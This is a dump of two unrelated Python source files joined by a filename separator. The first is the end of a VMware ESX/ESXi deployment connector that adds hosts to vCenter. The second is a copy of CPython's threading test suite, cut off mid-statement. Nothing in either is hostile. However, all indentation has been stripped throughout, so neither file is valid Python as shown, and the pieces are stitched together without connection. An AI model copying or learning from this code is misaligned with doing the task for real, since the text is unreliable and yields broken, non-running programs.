# For ESX, the personalization must be sent after the image is deployed and the agent is available.
if deployment_obj['personalization']:
log.debug("ESX: Reconfiguring host %s" % (uuid))
result = self.reconfigure(uuid, deployment_obj['personalization'], type)
if result.returnCode == 0:
id = result.scheduleIds[0]
log.debug("Reconfigure successful for host %s (schedule ID: %s)" % (uuid, id))
reconfiguring = True
while reconfiguring:
log.debug("In reconfigure loop...")
status = self.getScheduleStatusX(id)
if status:
status = status[0]
if hasattr(status, 'returnCode'):
log.debug("Received non-zero return code from getScheduleStatus for ID %s: %d" % (id, status.returnCode))
reconfiguring = False
elif 'status' in status and status['status'] >= 0:
log.debug("Reconfigure finished for host %s" % (uuid))
reconfiguring = False
else:
log.debug("Waiting for reconfigure to finish (host %s)" % (uuid))
sleep(30)
except:
log.info('exception in deploy_esx, reconfigure section: ', exc_info=1)
# Begin adding the host to vCenter. This process is now the same for ESX as it is for ESXi.
# The 6.3.1 ESX agent introduced an additional reboot that is not tracked by RDP. Therefore,
# we have to wait for the host to appear on the network before we can add it.
add_host_tasks = []
try:
if 'addToVCenter' in deployment_obj and deployment_obj['addToVCenter']['interface']:
interface = deployment_obj['addToVCenter']['interface']
if interface != '' and interface != 'DHCP':
log.debug("Adding to vCenter using: %s" % (interface))
if deployment_obj['addToVCenter']['username'] == "" and deployment_obj['addToVCenter']['password'] == "":
esx_credentials = None
else:
esx_credentials = (deployment_obj['addToVCenter']['username'], deployment_obj['addToVCenter']['password'])
log.debug("Credentials: %s, ************" % (deployment_obj['addToVCenter']['username']))
# Use the getThumbprint function to determine when the host is available. Try once every 5 minutes, up to 12 times.
# (basically wait for up to 60 minutes for the ESX installation to finish)
thumbprint = ''
count = 0
while thumbprint == '' and count < 12:
thumbprint = self._getHostThumbprint(interface)
if thumbprint == '':
node['add_to_vcenter'] = 'Waiting for ESX host at %s to become available.' % interface
log.debug("Received empty thumbprint for host %s. Waiting for 5 minutes." % (uuid))
count = count + 1
sleep(60*5)
log.debug("Thumbprint for host %s after polling: %s" % (uuid, thumbprint))
if thumbprint != '':
log.debug("Before addHostToVCenter: %s, %s, %s" % (interface, vcUuid, deployment_obj['addToVCenter']['cluster_name']))
result = self.addHostToVCenter(interface, vcUuid, deployment_obj['addToVCenter']['cluster_name'], esx_credentials)
if result and result._type == 'Task':
add_host_tasks.append({'uuid':uuid, 'result':result})
else:
log.debug("Result: %s" % str(result))
node['add_to_vcenter'] = 'Error adding host %s to vCenter. The vCenter server did not start the task. The host must be added manually.' % (interface)
else:
log.debug("Thumbprint not found. Unable to add host to vCenter.")
node['add_to_vcenter'] = 'Unable to contact the host at %s. Add to vCenter aborted.' % (interface)
else:
log.debug("Invalid interface for node %s: %s" % (uuid, interface))
if interface == 'DHCP':
node['add_to_vcenter'] = 'An interface configured for DHCP was specified. This host must be added to vCenter manually.'
else:
node['add_to_vcenter'] = 'No valid interface found. Add to vCenter aborted.'
else:
node['add_to_vcenter'] = 'No interface specified to add to vCenter.'
except Exception as ex:
node['add_to_vcenter'] = 'An error occurred while attempting to add host %s to vCenter. See the log for details.' % (interface)
log.exception("Exception while attempting vCenter add: %s" % (str(ex)))
# Monitor each of the add host tasks that were just started.
self.monitorAddHostTasks(add_host_tasks, vcUuid)
def _findJobType(self, job):
type = [x['type'] for x in self.jobFolders if x['name'] == job]
if type:
return type[0]
# Default to ESX since we only have two choices.
return "ESX"
def begin_run_deployment(self, deployment_collection):
# Don't even start the thread if the deployment process is already running.
if not self.deployment_sem.acquire(False):
return
t = Thread(target=self._run_deployment, name="run_deployment", args=(deployment_collection,))
t.daemon = True
t.start()
# The main deployment function. Once a deployment batch has been started, it must run to completion
# before another batch is started.
# The jobs parameter should be a list of server GUIDs and jobs to be applied to each server according to the following format:
# deployment_collection = [
# {
# serverUuid: <uuid>,
# jobs: [
# {name:'job folder name 1', type:'ESX'},
# {name:'job folder name 2', type:'ESXi'}
# ],
# addToVCenter: {
# interface: '172.17.99.100',
# cluster: 'my-cluster'
# },
# },
# ]
# This function should not be called directly! It should be started using the
# begin_run_deployment function.
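# A hypothetical end-to-end sketch (identifiers and values are illustrative; the keys follow
# the way _run_deployment and deploy_esx/deploy_esxi read the structure -- note that the code
# reads obj['jobs'][0] as a plain folder-name string and expects 'cluster_name' inside
# 'addToVCenter'):
#
#   connector = ALDeploymentConnector()
#   connector.begin_run_deployment({
#       'vcUuid': '<vcenter-uuid>',
#       'deploymentList': [{
#           'serverUuid': '<server-uuid>',
#           'jobs': ['ESXi Deployment Folder'],
#           'personalization': None,
#           'addToVCenter': {'interface': '172.17.99.100',
#                            'cluster_name': 'my-cluster',
#                            'username': '', 'password': ''},
#       }],
#   })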
def _run_deployment(self, deployment_object):
add_host_tasks = []
threads = []
deployment_collection = deployment_object['deploymentList']
vcUuid = deployment_object['vcUuid']
log.debug("Running deployment (vCenter: %s)" % (vcUuid))
# Helper function to monitor an array of running threads.
def wait_threads(threads):
while True:
alive_count = 0
for thread in threads:
if thread.is_alive():
alive_count += 1
if not alive_count:
break
sleep(1)
# First reset overall status so we start with a clean slate.
for obj in deployment_collection:
uuid = obj['serverUuid']
node = self._get_node(uuid)
node['overall_job_status'] = 0
if obj['personalization'] and 'nics' in obj['personalization']:
node['reconfigure'] = {'id':-1, 'message':ADDTOVC_NOT_STARTED}
threads = []
for obj in deployment_collection:
uuid = obj['serverUuid']
node = self._get_node(uuid)
job = obj['jobs'][0]
# If the job has been flagged as an 'ESXi' job, assume it's an ESXi image and treat it differently.
type = self._findJobType(job)
log.debug("Found job type %s for job %s" % (type, job))
# Set up the thread args.
args = (uuid, job, obj, vcUuid)
if type == 'ESXi':
log.debug("ESXi: Attempting to start job folder %s for server %s (reconfigure: %s)" % (job, uuid, str(obj['personalization'])))
t = Thread(target=self.deploy_esxi, args=args)
t.daemon = True
t.start()
threads.append(t)
else:
log.debug("ESX: Attempting to start job folder %s for server %s" % (job, uuid))
t = Thread(target=self.deploy_esx, args=args)
t.daemon = True
t.start()
threads.append(t)
# Wait for each of the individual deployment threads to complete.
fail_count = 0
if threads:
while True:
alive_count = 0
for thread in threads:
if thread.is_alive():
alive_count += 1
if not alive_count:
break
sleep(120)
# Check to see if our threads failed (due to comm loss)
if self.failures == len(threads):
self.dc_status = DC_STATUS_CONNECTION_LOST
else:
self.dc_status = DC_STATUS_DEPLOYMENT_FINISHED
# Reset the failure value since we're done.
self.monitor_sem.acquire()
self.failures = 0
self.monitor_sem.release()
self.deployment_sem.release()
log.debug("Deployment finished")
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
import gc
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args, **kwargs):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
gc.collect()
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
gc.collect()
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
@unittest.skip("samisdumb: forking with threads broken (possibly allocator related)")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_done_event(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
        # The _done_event is not set before the thread is started.
t = threading.Thread(target=f)
self.assertFalse(t._done_event.is_set())
t.start()
started.acquire()
self.assertTrue(t.is_alive())
        # The _done_event is not set while the thread is running
        # (or suspended).
self.assertFalse(t._done_event.wait(0), False)
finish.release()
        # When the thread ends, the _done_event is set.
self.assertTrue(t._done_event.wait(support.SHORT_TIMEOUT), False)
        # Let is_alive() find out the C code is done.
self.assertFalse(t.is_alive())
self.assertTrue(t._done_event.is_set())
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_daemon_thread(self):
r, w = self.pipe()
code = textwrap.dedent(f"""
import threading
import sys
channel = open({w}, "w", closefd=False)
def func():
pass
thread = threading.Thread(target=func, daemon=True)
try:
thread.start()
except RuntimeError as exc:
print("ok: %s" % exc, file=channel, flush=True)
else:
thread.join()
print("fail: RuntimeError not raised", file=channel, flush=True)
""")
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
msg = os.read(r, 100).decode().rstrip()
self.assertEqual("ok: daemon thread are not supported "
"in subinterpreters", msg)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
